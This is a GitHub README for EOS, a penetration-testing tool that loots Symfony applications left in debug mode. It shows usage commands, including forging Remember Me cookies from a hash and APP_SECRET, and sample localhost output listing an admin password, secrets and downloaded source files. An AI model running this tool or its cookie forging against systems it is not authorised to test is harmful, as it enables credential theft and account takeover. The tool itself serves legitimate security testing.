Skip to content

synacktiv/eos

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

16 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Enemies Of Symfony (EOS)

EOS loots information from a Symfony target in debug mode:

Section Description
General Get general information about the target.
Phpinfo Extract Symfony environment variables from the exposed phpinfo().
Routes Get the list of registered routes.
Request logs Look for credentials in POST request logs.
Project files Retrieve project files (configuration, database, etc.) based on a wordlist.
Sources Extract the application source code.
Cookies Craft Remember Me cookies.

More info at https://www.synacktiv.com/posts/pentest/looting-symfony-with-eos.html.

Note that this tool does not exploit any Symfony vulnerability. The profiler is a useful component for developers and EOS simply takes advantage on misconfigured Symfony applications. In fact, the profiler documentation prominently warns developers:

Never enable the profiler in production environments as it will lead to major security vulnerabilities in your project.

Thanks to all the Symfony team for their awesome work!

Installation

Tested on Python >= 3.7.

$ git clone https://github.com/Synacktiv/eos
$ python3 -m pip install --user ./eos

Usage

usage: eos [-h] [-V] [-v] [--no-colors] {scan,sources,get,creds,cookies} ...

  ███████╗ ██████╗ ███████╗
  ██╔════╝██╔═══██╗██╔════╝
  █████╗  ██║   ██║███████╗
  ██╔══╝  ██║   ██║╚════██║
  ███████╗╚██████╔╝███████║  Enemies Of Symfony
  ╚══════╝ ╚═════╝ ╚══════╝  v1.1

positional arguments:
  {scan,sources,get,creds,cookies}
    scan                 perform a full scan
    sources              download application source code
    get                  download a file from the application
    creds                extract credentials from request logs
    cookies              craft remember me cookies with a great lifetime

optional arguments:
  -h, --help             show this help message and exit
  -V, --version          display version info
  -v, --verbose          increase verbosity
  --no-colors            disable colors in output

examples:
  eos scan http://localhost
  eos scan -H 'Cookie: foo=bar; john=doe' -H 'User-Agent: EOS' http://localhost
  eos get http://localhost config/services.yaml
  eos cookies -u jane_admin -H '$2y$13$IMalnQpo7xfZD5FJGbEadOcqyj2mi/NQbQiI8v2wBXfjZ4nwshJlG' -s 67d829bf61dc5f87a73fd814e2c9f629
$ eos scan http://localhost --output results
[+] Starting scan on http://localhost
[+] 2020-04-23 14:21:26.463352 is a great day

[+] Info
[!]   Symfony 5.0.1
[!]   PHP 7.3.11-1~deb10u1
[!]   Environment: dev

[+] Request logs
[+] Found 9 POST requests
[!] Found the following credentials with a valid session:
[!]   jane_admin: kitten [ROLE_ADMIN]

[+] Phpinfo
[+] Available at http://localhost/_profiler/phpinfo
[+] Found 101 PHP variables
[!] Found the following Symfony variables:
[!]   APP_ENV: dev
[!]   APP_SECRET: 67d829bf61dc5f87a73fd814e2c9f629
[!]   DATABASE_URL: sqlite:///%kernel.project_dir%/data/database.sqlite
[!]   MAILER_URL: null://localhost

[+] Project files
[+] Found: composer.lock, run 'symfony security:check' or submit it at https://security.symfony.com
[!] Found the following files:
[!]   composer.lock
[!]   composer.json
[!]   config/bundles.php
[!]   config/bootstrap.php
[!]   config/packages/assets.yaml
[!]   config/packages/cache.yaml
[!]   config/packages/dev/debug.yaml
[!]   config/packages/dev/monolog.yaml
[!]   config/packages/dev/routing.yaml
[!]   config/packages/dev/swiftmailer.yaml
[!]   config/packages/dev/web_profiler.yaml
[!]   config/packages/doctrine_migrations.yaml
[!]   config/packages/doctrine.yaml
[!]   config/packages/framework.yaml
[!]   config/packages/html_sanitizer.yaml
[!]   config/packages/prod/doctrine.yaml
[!]   config/packages/prod/monolog.yaml
[!]   config/packages/prod/routing.yaml
[!]   config/packages/prod/webpack_encore.yaml
[!]   config/packages/routing.yaml
[!]   config/packages/security.yaml
[!]   config/packages/sensio_framework_extra.yaml
[!]   config/packages/swiftmailer.yaml
[!]   config/packages/test/dama_doctrine_test_bundle.yaml
[!]   config/packages/test/framework.yaml
[!]   config/packages/test/monolog.yaml
[!]   config/packages/test/routing.yaml
[!]   config/packages/test/security.yaml
[!]   config/packages/test/swiftmailer.yaml
[!]   config/packages/test/twig.yaml
[!]   config/packages/test/validator.yaml
[!]   config/packages/test/webpack_encore.yaml
[!]   config/packages/test/web_profiler.yaml
[!]   config/packages/translation.yaml
[!]   config/packages/twig.yaml
[!]   config/packages/validator.yaml
[!]   config/packages/webpack_encore.yaml
[!]   config/routes/annotations.yaml
[!]   config/routes/dev/framework.yaml
[!]   config/routes/dev/web_profiler.yaml
[!]   config/routes.yaml
[!]   config/services.yaml
[!]   data/database.sqlite
[!]   data/database_test.sqlite
[!]   package.json
[!]   public/index.php
[!]   public/robots.txt
[!]   README.md
[!]   src/Kernel.php
[!]   symfony.lock
[!]   var/cache/dev/url_generating_routes.php
[!]   var/cache/dev/url_matching_routes.php
[!]   var/log/dev.log

[+] Routes
[!] Found the following routes:
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/
[!]   /{_locale}/admin/post/new
[!]   /{_locale}/admin/post/{id}
[!]   /{_locale}/admin/post/{id}/edit
[!]   /{_locale}/admin/post/{id}/delete
[!]   /{_locale}/blog/
[!]   /{_locale}/blog/rss.xml
[!]   /{_locale}/blog/page/{page}
[!]   /{_locale}/blog/posts/{slug}
[!]   /{_locale}/blog/comment/{postSlug}/new
[!]   /{_locale}/blog/search
[!]   /{_locale}/login
[!]   /{_locale}/logout
[!]   /{_locale}/profile/edit
[!]   /{_locale}/profile/change-password
[!]   /{_locale}

[+] Project sources
[!] Found the following source files:
[!]   src/Command/AddUserCommand.php
[!]   src/Command/DeleteUserCommand.php
[!]   src/Command/ListUsersCommand.php
[!]   src/Controller/Admin/BlogController.php
[!]   src/Controller/BlogController.php
[!]   src/Controller/SecurityController.php
[!]   src/Controller/UserController.php
[!]   src/DataFixtures/AppFixtures.php
[!]   src/Entity/Comment.php
[!]   src/Entity/Post.php
[!]   src/Entity/Tag.php
[!]   src/Entity/User.php
[!]   src/EventSubscriber/CheckRequirementsSubscriber.php
[!]   src/EventSubscriber/CommentNotificationSubscriber.php
[!]   src/EventSubscriber/ControllerSubscriber.php
[!]   src/EventSubscriber/RedirectToPreferredLocaleSubscriber.php
[!]   src/Events/CommentCreatedEvent.php
[!]   src/Form/CommentType.php
[!]   src/Form/DataTransformer/TagArrayToStringTransformer.php
[!]   src/Form/PostType.php
[!]   src/Form/Type/ChangePasswordType.php
[!]   src/Form/Type/DateTimePickerType.php
[!]   src/Form/Type/TagsInputType.php
[!]   src/Form/UserType.php
[!]   src/Kernel.php
[!]   src/Pagination/Paginator.php
[!]   src/Repository/PostRepository.php
[!]   src/Repository/TagRepository.php
[!]   src/Repository/UserRepository.php
[!]   src/Security/PostVoter.php
[!]   src/Twig/AppExtension.php
[!]   src/Twig/SourceCodeExtension.php
[!]   src/Utils/Markdown.php
[!]   src/Utils/MomentFormatConverter.php
[!]   src/Utils/Slugger.php
[!]   src/Utils/Validator.php

[+] Saving files to results
[+] Saved 88 files

[+] Generated tokens: 5894a5 f68efa
[+] Scan completed in 0:00:13

About

Enemies Of Symfony - Debug mode Symfony looter

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 3

  •  
  •  
  •